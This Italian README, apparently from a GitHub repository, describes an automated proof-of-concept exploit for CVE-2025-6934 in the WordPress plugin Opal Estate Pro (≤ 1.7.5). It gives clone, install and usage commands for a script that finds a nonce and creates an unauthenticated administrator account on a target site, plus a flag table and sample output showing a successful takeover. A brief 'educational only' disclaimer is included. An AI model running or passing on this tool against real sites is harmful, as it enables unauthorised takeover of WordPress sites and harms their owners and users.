
Exploit PoC automatizzato per WordPress Opal Estate Pro che rileva le versioni vulnerabili, recupera il nonce e crea account amministratore non autorizzati.
CVE-2025-6934 è un exploit proof-of-concept (PoC) che prende di mira Plugin WordPress: Opal Estate Pro ≤ 1.7.5.
Questo exploit dimostra la creazione non autenticata di un account amministratore.
Disclaimer: Questa PoC è solo a scopo didattico. Non utilizzare su sistemi senza autorizzazione.
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
pip install -r requirements.txt
Requisiti:
requests,beautifulsoup4,colorama
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337
| Flag | Descrizione | Obbligatorio | Predefinito |
|---|---|---|---|
-u, --url | URL del sito target | Sì | - |
-mail, --newmail | Email per il nuovo admin | Sì | - |
-password, --newpassword | Password per il nuovo admin | Sì | - |
-user, --username | Nome utente per il nuovo admin | No | administrator |
La console mostra:
[•][✔][✖][i]Esempio:
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
Username : r1337
Email : [email protected]
Password : 3xplo1tI5Fun
Role : administrator
Sono uno sviluppatore attivo a cui piace creare strumenti e condividere conoscenza. Puoi contattarmi tramite: